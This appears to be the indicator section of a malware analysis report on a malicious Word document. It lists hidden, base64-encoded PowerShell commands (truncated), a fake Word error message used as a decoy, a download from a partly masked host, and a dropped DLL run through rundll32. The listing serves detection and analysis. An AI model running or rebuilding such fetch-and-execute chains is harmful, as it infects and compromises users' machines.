Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1089448.cvr
- %HOMEPATH%\e1bad5e\rvmn7kd\fhdtme10.dll
- http://se#########ompass.inifaresworkshops.com/vr6ebzold.png
- DNS ASK se#########ompass.inifaresworkshops.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\E1bad5e\Rvmn7kd\Fhdtme10.dll 0